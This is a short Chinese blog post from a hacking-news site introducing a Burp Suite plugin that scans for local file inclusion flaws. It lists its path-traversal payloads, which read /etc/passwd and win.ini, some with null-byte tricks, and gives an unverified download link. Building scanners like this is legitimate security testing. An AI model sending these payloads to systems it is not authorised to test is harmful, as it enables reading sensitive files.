Burp国产插件LFI scanner checks

Burp国产插件LFI scanner checks

黑客平台访客2021-10-12 9:31:006713A+A-

LFI scanner checks是为了笔者为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的。

截图:

来对比下J2EESCAN里面附带的LFI探测

下面是安装上 LFI scanner checks

我使用的payload如下

../../../../../../../../../../../../../../../../etc/passwd%00.html
../../../../../../../../../../../../../../../../etc/passwd
file:///etc/passwd
file:///c:/windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../../windows/win.ini%00.html

下载地址链接: http://pan.baidu.com/s/1gdfITIN 密码: 4fv7

提示:请自行检测程序安全性

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 只酷空枝2022-05-28 09:03:13
  • LFI scanner checks是为了笔者为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的。截图:来对比下J2EESCAN里面附带的LF
  • 忿咬旧谈2022-05-28 08:47:47
  • LFI scanner checks是为了笔者为burp轻量级扫描器做的一个检测LFI漏洞插件,因为burp没有一个有效的检测LFI功能的。截图:来对比下J2EESCAN里面附带的LFI探测 下面是安装上 LFI scanner checks我使用的
  • 弦久晚鲸2022-05-28 11:59:56
  • ../../../../../../../../../../../windows/win.ini%00.html下载地址链接: http://pan.baidu.com/s/1gdfITIN

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理